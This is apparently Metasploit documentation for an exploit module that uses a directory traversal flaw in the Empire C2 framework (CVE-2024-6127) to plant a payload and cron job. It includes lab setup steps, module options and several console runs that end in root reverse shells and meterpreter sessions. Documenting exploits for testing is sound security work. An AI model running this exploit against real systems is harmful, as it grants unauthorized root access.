metasploit-gs/documentation/modules/exploit/linux/http/empire_skywalker.md

## Vulnerable Application
This module exploits a directory traversal vulnerability in both
BC-SECURITY/Empire C2 Framework (<5.9.3) and ProjectEmpire/Empire (<f030cf62) and
writes the payload to /tmp/ directory followed by a cron.d file to execute the payload.

The vulnerability affects:

    * BC-SECURITY/Empire C2 Framework (<5.9.3)
    * ProjectEmpire/Empire (<f030cf62)

This module was successfully tested on:

    * BC-SECURITY/Empire C2 Framework (v5.9.2) on Kali Linux 6.6.15
    * BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15
    * ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15


### Install and run the vulnerable Empire
#### BC-SECURITY/Empire
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Pull pre-built Empire docker container (<5.9.3) in your VM.
   `docker pull bcsecurity/empire:v5.9.2`
4. Run the server and the client on the same VM.
5. Run the server.

`docker run -it --net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d bcsecurity/empire:v5.9.2`
(`--net="host" -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d` is not realistic but for simplicity
 and payload will be loaded in host not in container) or
```
docker run -it --net="host" bcsecurity/empire:v5.9.2
docker exec -it <server container id> bash
apt update
apt install cron
cron
```
\(Payload will be loaded in container but you have to manually set up cron on container.)

6. Run the client.
`docker run -it --net="host" bcsecurity/empire:v5.9.2 client`
7. Execute Empire listener on client.
```bash
uselistener http
set Host <rhost>
set Port <port>
execute
```

#### ProjectEmpire/Empire
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
3. Clone empire.
`git clone https://github.com/EmpireProject/Empire.git`
4. `cd Empire`
5. `git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110`
6. `docker pull empireproject/empire`
7. `docker run -it --net="host" -v $(pwd):/opt/Empire -v /tmp:/tmp -v /etc/cron.d:/etc/cron.d empireproject/empire /bin/bash`

(Payload will be loaded in host not in container.) or
```
docker run -it --net="host" empireproject/empire /bin/bash
cron
```
(Payload will be loaded in container but you have to manually set up cron on container.)

8. `cd setup`
9. `./reset.sh` (Empire start)
10. Execute listener.
```bash
listeners
set Host <rhost>
set Port <port>
run
```


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/empire_skywalker`
4. Do: `set rhost <rhost>`
5. Do: `set rport <port>`
6. Do: `set lhost <attacker-ip>`
7. Optional: `set CVE <cve>`
8. Do: `run`
9. Have the generated request processed by a vulnerable version of Empire
10. You should get a shell or meterpreter


## Options

###  TARGETURI (optional)

This is the Base URI path. This is used when CVE is set to `Original`. Default is `/`.

### STAGE0_URI (required)

This is the URI path requested by the initial launcher. This is used when CVE is set to `Original`. Default is `index.asp`.

### STAGE1_URI (required)

This is the URI path used by the RSA key post. This is used when CVE is set to `Original`. Default is `index.jsp`

### PROFILE (optional)

This is Empire agent traffic profile URI. This is used when CVE is set to `Original`.

### CVE (required)

This is the vulnerability to use. Default is `CVE-2024-6127`, but `Original` can also be chosen.

### STAGE_PATH (required)

This is the Empire's default staging path. This is used when CVE is set to `CVE-2024-6127`. Default is `login/process.php`.
([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))

### PROFILE (required)

This is the Empire's default communication profile agent.  This is used when CVE is set to `CVE-2024-6127`.
Default is `Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko`
([reference](https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/agents.py#L169))


## Scenarios
### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 0, port 80)
```
msf > use exploit/linux/http/empire_skywalker
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.7
rhost => 192.168.56.7
msf exploit(linux/http/empire_skywalker) > set rport 80
rport => 80
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.7:80 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/NYLkIKRK
[*] Writing cron job to /etc/cron.d/AeVTTPiZ
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.7
[+] Deleted /etc/cron.d/AeVTTPiZ
[+] Deleted /tmp/NYLkIKRK
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.7:48026) at 2024-07-20 11:32:03 +0900
[!] This exploit may require manual cleanup of '/var/lib/powershell-empire/empire/server/downloads/LML47FWS/agent.log' on the target

meterpreter > sysinfo
Computer        : kali
OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
```

### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/jJzYkeKV
[*] Writing cron job to /etc/cron.d/nFnFIbim
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/nFnFIbim
[+] Deleted /tmp/jJzYkeKV
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/WV9TEJTE/agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:42068) at 2024-07-20 14:40:09 +0900

whoami
root
```

### BC-SECURITY/Empire C2 Framework (v5.9.2) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/qxlOSIYF
[*] Writing cron job to /etc/cron.d/ugrYIJzf
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/ugrYIJzf
[+] Deleted /tmp/qxlOSIYF
[!] Tried to delete /var/lib/powershell-empire/empire/server/downloads/JJR8EMKK/agent.log, unknown result
[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:46040) at 2024-07-20 14:44:09 +0900

whoami
root
```

### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 0, port 8080)
```
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set CVE Original 
CVE => Original
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/PSDaqPOJ
[*] Writing cron job to /etc/cron.d/KQlwBZQk
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (24772 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/KQlwBZQk
[+] Deleted /tmp/PSDaqPOJ
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:38552) at 2024-07-24 18:01:04 +0900
[!] This exploit may require manual cleanup of '/agent.log' on the target

meterpreter > sysinfo
Computer        : kali
OS              : Linux 6.6.15-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.6.15-2kali1 (2024-05-17)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```

### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 1, port 8080)
```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set CVE Original
CVE => Original
msf exploit(linux/http/empire_skywalker) > set target 1
target => 1
msf exploit(linux/http/empire_skywalker) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/VzTAquhE
[*] Writing cron job to /etc/cron.d/LjvThMOu
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (36 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/LjvThMOu
[+] Deleted /tmp/VzTAquhE
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:47140) at 2024-07-24 18:06:08 +0900

whoami
root
```

### ProjectEmpire/Empire (03ca7bdbcc81457da8e8c1419b36adf66fe9b110) installed with Docker on Kali Linux 6.6.15 (target 2, port 8080)
```
msf > use exploit/linux/http/empire_skywalker
[*] Using configured payload linux/x86/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > set rhost 192.168.56.6
rhost => 192.168.56.6
msf exploit(linux/http/empire_skywalker) > set rport 8080
rport => 8080
msf exploit(linux/http/empire_skywalker) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(linux/http/empire_skywalker) > set cve Original
cve => Original
msf exploit(linux/http/empire_skywalker) > set target 2
target => 2
msf exploit(linux/http/empire_skywalker) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(linux/http/empire_skywalker) > check
[*] 192.168.56.6:8080 - The target appears to be vulnerable.
msf exploit(linux/http/empire_skywalker) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Successfully negotiated an artificial Empire agent
[*] Writing payload to /tmp/uuTqlfDp
[*] Writing cron job to /etc/cron.d/frDtYnmD
[*] Waiting for cron job to run, can take up to 60 seconds
[*] Sending stage (38 bytes) to 192.168.56.6
[+] Deleted /etc/cron.d/frDtYnmD
[+] Deleted /tmp/uuTqlfDp
[!] Tried to delete /agent.log, unknown result
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:51566) at 2024-07-24 18:08:08 +0900

whoami
root
```